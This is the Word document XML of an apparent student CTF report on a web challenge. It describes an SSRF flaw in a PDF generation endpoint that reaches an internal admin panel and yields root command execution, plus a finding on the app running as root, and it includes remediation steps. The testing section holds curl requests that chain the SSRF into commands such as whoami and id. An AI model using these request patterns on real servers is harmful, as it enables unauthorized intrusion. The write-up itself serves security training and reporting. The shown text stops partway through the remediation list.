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5C350" w14:textId="77777777" w:rsidR="00617F48" w:rsidRDefault="00617F48" w:rsidP="00617F48">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A979238" w14:textId="77777777" w:rsidR="00617F48" w:rsidRDefault="00617F48" w:rsidP="00617F48">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B5E4C31" w14:textId="77777777" w:rsidR="00617F48" w:rsidRDefault="00617F48" w:rsidP="00617F48">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E7CAE8B" w14:textId="77777777" w:rsidR="00617F48" w:rsidRDefault="00617F48" w:rsidP="00617F48">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0786E642" w14:textId="77777777" w:rsidR="00617F48" w:rsidRDefault="00617F48" w:rsidP="00617F48">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68A0975C" w14:textId="77777777" w:rsidR="00617F48" w:rsidRDefault="00617F48" w:rsidP="00617F48">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B392BF4" w14:textId="77777777" w:rsidR="00617F48" w:rsidRDefault="00617F48" w:rsidP="00617F48">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BEEFFAB" w14:textId="77777777" w:rsidR="00617F48" w:rsidRDefault="00617F48" w:rsidP="00617F48">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AA47C9B" w14:textId="5580AD90" w:rsidR="00A45A93" w:rsidRPr="005C4AF8" w:rsidRDefault="00EE1243" w:rsidP="005C4AF8">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617F48">
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Web Challenge Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6C0782" w14:textId="77777777" w:rsidR="00617F48" w:rsidRDefault="00617F48" w:rsidP="00617F48">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Joshua Babcock</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>jobabcoc@syr.edu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2CC0A7" w14:textId="77777777" w:rsidR="00643941" w:rsidRDefault="00643941" w:rsidP="00643941"/>
    <w:p w14:paraId="7B9936DF" w14:textId="77777777" w:rsidR="00643941" w:rsidRDefault="00643941" w:rsidP="00643941"/>
    <w:p w14:paraId="4DBBBA3B" w14:textId="77777777" w:rsidR="00643941" w:rsidRDefault="00643941" w:rsidP="00643941"/>
    <w:p w14:paraId="12CFF0C4" w14:textId="77777777" w:rsidR="00643941" w:rsidRDefault="00643941" w:rsidP="00643941"/>
    <w:p w14:paraId="1312ED6D" w14:textId="77777777" w:rsidR="00643941" w:rsidRDefault="00643941" w:rsidP="00643941"/>
    <w:p w14:paraId="4A02575E" w14:textId="77777777" w:rsidR="00260E32" w:rsidRDefault="00260E32" w:rsidP="00643941"/>
    <w:p w14:paraId="345E4860" w14:textId="77777777" w:rsidR="00260E32" w:rsidRDefault="00260E32" w:rsidP="00643941"/>
    <w:p w14:paraId="6C85FBCB" w14:textId="77777777" w:rsidR="00260E32" w:rsidRDefault="00260E32" w:rsidP="00643941"/>
    <w:p w14:paraId="4DED49F5" w14:textId="77777777" w:rsidR="00260E32" w:rsidRDefault="00260E32" w:rsidP="00643941"/>
    <w:p w14:paraId="2EE9B850" w14:textId="77777777" w:rsidR="00260E32" w:rsidRDefault="00260E32" w:rsidP="00643941"/>
    <w:p w14:paraId="49A98FC0" w14:textId="77777777" w:rsidR="00260E32" w:rsidRDefault="00260E32" w:rsidP="00643941"/>
    <w:p w14:paraId="5C9BFC02" w14:textId="77777777" w:rsidR="00260E32" w:rsidRDefault="00260E32" w:rsidP="00643941"/>
    <w:p w14:paraId="4948515C" w14:textId="77777777" w:rsidR="00260E32" w:rsidRDefault="00260E32" w:rsidP="00643941"/>
    <w:p w14:paraId="46119A6C" w14:textId="77777777" w:rsidR="00260E32" w:rsidRDefault="00260E32" w:rsidP="00643941"/>
    <w:p w14:paraId="03037C3F" w14:textId="77777777" w:rsidR="00260E32" w:rsidRDefault="00260E32" w:rsidP="00643941"/>
    <w:p w14:paraId="20697B5B" w14:textId="64B779D7" w:rsidR="008A6460" w:rsidRPr="008C2BC7" w:rsidRDefault="008A6460" w:rsidP="008A6460">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2BC7">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Name: </w:t>
      </w:r>
      <w:r w:rsidR="00F84E3D">
        <w:t>SSRF -&gt; RCE via PDF Generation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AE1952" w14:textId="77777777" w:rsidR="008A6460" w:rsidRPr="008C2BC7" w:rsidRDefault="008A6460" w:rsidP="008A6460">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2BC7">
        <w:t>Risk Rating: [</w:t>
      </w:r>
      <w:r w:rsidRPr="00F84E3D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t>Critical</w:t>
      </w:r>
      <w:r w:rsidRPr="00F84E3D">
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C2BC7">
        <w:t>/ High / Medium / Low]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770E084C" w14:textId="77777777" w:rsidR="008A6460" w:rsidRPr="008C2BC7" w:rsidRDefault="008A6460" w:rsidP="008A6460">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2BC7">
        <w:t>Exploitation Likelihood: [</w:t>
      </w:r>
      <w:r w:rsidRPr="00F84E3D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t>Critical</w:t>
      </w:r>
      <w:r w:rsidRPr="00F84E3D">
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C2BC7">
        <w:t>/ High / Medium / Low]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70613D93" w14:textId="77777777" w:rsidR="008A6460" w:rsidRPr="008C2BC7" w:rsidRDefault="008A6460" w:rsidP="008A6460">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2BC7">
        <w:t>Potential Impact: [</w:t>
      </w:r>
      <w:r w:rsidRPr="00F84E3D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Critical </w:t>
      </w:r>
      <w:r w:rsidRPr="008C2BC7">
        <w:t>/ High / Medium / Low]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEA0E77" w14:textId="77777777" w:rsidR="008A6460" w:rsidRPr="008C2BC7" w:rsidRDefault="008A6460" w:rsidP="008A6460">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2BC7">
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F21EBE8" w14:textId="43728560" w:rsidR="008A6460" w:rsidRPr="008C2BC7" w:rsidRDefault="009927D0" w:rsidP="008A6460">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009927D0">
        <w:t>The PDF generation endpoint (</w:t>
      </w:r>
      <w:r w:rsidRPr="008B5551">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/pdf</w:t>
      </w:r>
      <w:r w:rsidRPr="009927D0">
        <w:t xml:space="preserve">) accepts a user-controlled </w:t>
      </w:r>
      <w:r w:rsidRPr="008B5551">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:r w:rsidRPr="009927D0">
        <w:t xml:space="preserve"> parameter that is processed by the </w:t>
      </w:r>
      <w:r w:rsidRPr="008B5551">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>wkhtmltopdf</w:t>
      </w:r>
      <w:r w:rsidRPr="009927D0">
        <w:t xml:space="preserve"> library without proper validation. This creates a Server-Side Request Forgery (SSRF) vulnerability that allows attackers to make arbitrary HTTP requests from the server. More critically, this SSRF can access an internal admin panel at </w:t>
      </w:r>
      <w:r w:rsidRPr="008B5551">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>http://localhost/admin</w:t>
      </w:r>
      <w:r w:rsidRPr="009927D0">
        <w:t xml:space="preserve"> that provides command execution capabilities. The combination of SSRF and the exposed admin interface results in Remote Code Execution with root privileges, representing a complete system compromise</w:t>
      </w:r>
      <w:r w:rsidR="006B765D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD9B156" w14:textId="77777777" w:rsidR="008A6460" w:rsidRPr="008C2BC7" w:rsidRDefault="008A6460" w:rsidP="008A6460">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2BC7">
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771CB4EF" w14:textId="68D0757E" w:rsidR="00B02932" w:rsidRDefault="00B02932" w:rsidP="00B02932">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Implement strict URL validation and </w:t>
      </w:r>
      <w:r w:rsidR="00D430DF">
        <w:t>white</w:t>
      </w:r>
      <w:r>
        <w:t>listing for the PDF generation endpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235636C1" w14:textId="77777777" w:rsidR="00B02932" w:rsidRDefault="00B02932" w:rsidP="00B02932">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Remove or properly secure the admin interface with authentication and authorization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7F3C64" w14:textId="77777777" w:rsidR="00B02932" w:rsidRDefault="00B02932" w:rsidP="00B02932">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use a separate, isolated service for PDF generation with restricted network access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553C9D98" w14:textId="77777777" w:rsidR="00B02932" w:rsidRDefault="00B02932" w:rsidP="00B02932">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Implement network segmentation to prevent access to internal services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D76C57E" w14:textId="434FE212" w:rsidR="008A6460" w:rsidRPr="008C2BC7" w:rsidRDefault="00B02932" w:rsidP="00B02932">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Apply the principle of least privilege - run the application with a non-root user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648BA1D2" w14:textId="77777777" w:rsidR="008A6460" w:rsidRDefault="008A6460" w:rsidP="008A6460">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2BC7">
        <w:t>Testing Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EC9571" w14:textId="77777777" w:rsidR="005B2896" w:rsidRDefault="005B2896" w:rsidP="005B2896">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Identified the hidden PDF form in the homepage source code with a </w:t>
      </w:r>
      <w:r w:rsidRPr="005B2896">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> parameter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602DCF5D" w14:textId="77777777" w:rsidR="005B2896" w:rsidRPr="005B2896" w:rsidRDefault="005B2896" w:rsidP="005B2896">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tested basic SSRF functionality: </w:t>
      </w:r>
      <w:r w:rsidRPr="005B2896">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>curl -X POST https://ctf.rsl.host/pdf -d "url=http://localhost"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58790F48" w14:textId="77777777" w:rsidR="005B2896" w:rsidRPr="005B2896" w:rsidRDefault="005B2896" w:rsidP="005B2896">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Discovered internal admin panel: </w:t>
      </w:r>
      <w:r w:rsidRPr="005B2896">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>curl -X POST https://ctf.rsl.host/pdf -d "url=http://localhost/admin"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374C1798" w14:textId="77777777" w:rsidR="005B2896" w:rsidRPr="005B2896" w:rsidRDefault="005B2896" w:rsidP="005B2896">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Achieved RCE through admin interface: </w:t>
      </w:r>
      <w:r w:rsidRPr="005B2896">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>curl -X POST https://ctf.rsl.host/pdf -d "url=http://localhost/admin?cmd=whoami"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726AC1FB" w14:textId="31CC14BD" w:rsidR="009F0403" w:rsidRPr="008C2BC7" w:rsidRDefault="005B2896" w:rsidP="005B2896">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Confirmed root access and full system compromise</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="005B2896">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>curl -X POST https://ctf.rsl.host/pdf -d "url=http://localhost/admin?cmd=i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="005B2896">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E49829" w14:textId="4DBAF95D" w:rsidR="00CE4B9B" w:rsidRDefault="00B27214" w:rsidP="000840A2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="18FD37A9" wp14:editId="5736F254">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>365760</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>5082540</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5448300" cy="541020"/>
                <wp:effectExtent l="19050" t="19050" r="19050" b="11430"/>
                <wp:wrapNone/>
                <wp:docPr id="1151245708" name="Rectangle 5"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5448300" cy="541020"/>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DE8CC" id="Rectangle 5" o:spid="_x0000_s1026" style="position:absolute;margin-left:28.8pt;margin-top:400.2pt;width:429pt;height:4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" filled="f" strokecolor="#e00" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="000840A2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F07F76B" wp14:editId="26DD1148">
            <wp:extent cx="5798820" cy="5859780"/>
            <wp:effectExtent l="95250" t="95250" r="87630" b="102870"/>
            <wp:docPr id="670668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8820" cy="5859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674AFF" w14:textId="5FF6A47D" w:rsidR="00B27214" w:rsidRDefault="00B27214" w:rsidP="009154BF">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2051A451" wp14:editId="51D821B5">
            <wp:extent cx="5867400" cy="2651760"/>
            <wp:effectExtent l="95250" t="95250" r="95250" b="91440"/>
            <wp:docPr id="1395056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7400" cy="2651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D0C1E5" w14:textId="07E348ED" w:rsidR="00921F19" w:rsidRDefault="00921F19" w:rsidP="009154BF">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="453C3AAB" wp14:editId="153AFC9D">
            <wp:extent cx="5943600" cy="3474720"/>
            <wp:effectExtent l="95250" t="95250" r="95250" b="87630"/>
            <wp:docPr id="4807669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7445B1" w14:textId="77777777" w:rsidR="000E4F6C" w:rsidRDefault="00B27214" w:rsidP="009154BF">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0AB01350" wp14:editId="27288C67">
            <wp:extent cx="5852160" cy="1592580"/>
            <wp:effectExtent l="95250" t="95250" r="91440" b="102870"/>
            <wp:docPr id="347888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15925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703AA5" w14:textId="365C51BA" w:rsidR="000E4F6C" w:rsidRDefault="000E4F6C" w:rsidP="009154BF">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EDF8C4A" wp14:editId="7E7BCB0B">
            <wp:extent cx="5935980" cy="2545080"/>
            <wp:effectExtent l="95250" t="95250" r="102870" b="102870"/>
            <wp:docPr id="435740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45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F55120" w14:textId="21CE392D" w:rsidR="00B27214" w:rsidRDefault="00B27214" w:rsidP="009154BF">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05FBF146" wp14:editId="43EB1A30">
            <wp:extent cx="5867400" cy="3230880"/>
            <wp:effectExtent l="95250" t="95250" r="95250" b="102870"/>
            <wp:docPr id="1283880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230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EBCC01" w14:textId="5FE23BC0" w:rsidR="000E4F6C" w:rsidRDefault="000E4F6C" w:rsidP="009154BF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66B55DC5" wp14:editId="3737FBF3">
            <wp:extent cx="4792980" cy="3451860"/>
            <wp:effectExtent l="95250" t="95250" r="102870" b="91440"/>
            <wp:docPr id="1470775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3451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5339C8" w14:textId="76A69849" w:rsidR="000E4F6C" w:rsidRDefault="000E4F6C" w:rsidP="009154BF">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F983003" wp14:editId="0DF44136">
            <wp:extent cx="5486400" cy="2727960"/>
            <wp:effectExtent l="95250" t="95250" r="95250" b="91440"/>
            <wp:docPr id="1436630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279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CBA1BE" w14:textId="77777777" w:rsidR="00EA4A3C" w:rsidRDefault="00EA4A3C" w:rsidP="00EA4A3C"/>
    <w:p w14:paraId="2496FFAA" w14:textId="77777777" w:rsidR="009F0403" w:rsidRDefault="009F0403" w:rsidP="00EA4A3C"/>
    <w:p w14:paraId="1917381A" w14:textId="77777777" w:rsidR="009F0403" w:rsidRDefault="009F0403" w:rsidP="00EA4A3C"/>
    <w:p w14:paraId="05940855" w14:textId="77777777" w:rsidR="009F0403" w:rsidRDefault="009F0403" w:rsidP="00EA4A3C"/>
    <w:p w14:paraId="2C54EB49" w14:textId="5C77F3FB" w:rsidR="00427D0A" w:rsidRPr="008C2BC7" w:rsidRDefault="00427D0A" w:rsidP="00427D0A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2BC7">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Name: </w:t>
      </w:r>
      <w:r w:rsidR="005B1525">
        <w:t>Application Running as Root User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D30BB0" w14:textId="77777777" w:rsidR="00427D0A" w:rsidRPr="008C2BC7" w:rsidRDefault="00427D0A" w:rsidP="00427D0A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2BC7">
        <w:t xml:space="preserve">Risk Rating: [Critical / </w:t>
      </w:r>
      <w:r w:rsidRPr="00D45D9C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
      <w:r w:rsidRPr="00D45D9C">
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C2BC7">
        <w:t>/ Medium / Low]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B74334E" w14:textId="77777777" w:rsidR="00427D0A" w:rsidRPr="008C2BC7" w:rsidRDefault="00427D0A" w:rsidP="00427D0A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2BC7">
        <w:t xml:space="preserve">Exploitation Likelihood: [Critical / </w:t>
      </w:r>
      <w:r w:rsidRPr="00D45D9C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
      <w:r w:rsidRPr="008C2BC7">
        <w:t xml:space="preserve"> / Medium / Low]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E12568" w14:textId="77777777" w:rsidR="00427D0A" w:rsidRPr="008C2BC7" w:rsidRDefault="00427D0A" w:rsidP="00427D0A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2BC7">
        <w:t>Potential Impact: [</w:t>
      </w:r>
      <w:r w:rsidRPr="00D45D9C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t>Critical</w:t>
      </w:r>
      <w:r w:rsidRPr="008C2BC7">
        <w:t xml:space="preserve"> / High / Medium / Low]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F64DA1A" w14:textId="77777777" w:rsidR="00427D0A" w:rsidRPr="008C2BC7" w:rsidRDefault="00427D0A" w:rsidP="00427D0A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2BC7">
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0FF0AF" w14:textId="29EBF7EC" w:rsidR="00427D0A" w:rsidRPr="008C2BC7" w:rsidRDefault="00D57011" w:rsidP="00427D0A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D57011">
        <w:t>The Flask application is configured to run with root privileges (UID 0), violating the fundamental security principle of least privilege. This configuration significantly amplifies the impact of any code execution vulnerabilities, as demonstrated by the SSRF→RCE chain that immediately provides root access. Running web applications as root creates an unnecessarily large attack surface and can lead to complete system compromise from otherwise limited vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D91503A" w14:textId="77777777" w:rsidR="00427D0A" w:rsidRPr="008C2BC7" w:rsidRDefault="00427D0A" w:rsidP="00427D0A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2BC7">
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42035909" w14:textId="77777777" w:rsidR="00B15ED9" w:rsidRDefault="00B15ED9" w:rsidP="00B15ED9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Create a dedicated non-privileged user account for the application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157B8F9B" w14:textId="77777777" w:rsidR="00B15ED9" w:rsidRDefault="00B15ED9" w:rsidP="00B15ED9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Update the </w:t>
      </w:r>
      <w:r w:rsidRPr="00E50383">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>systemd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> service file to use </w:t>
      </w:r>
      <w:r w:rsidRPr="00E50383">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>User=appuser</w:t>
      </w:r>
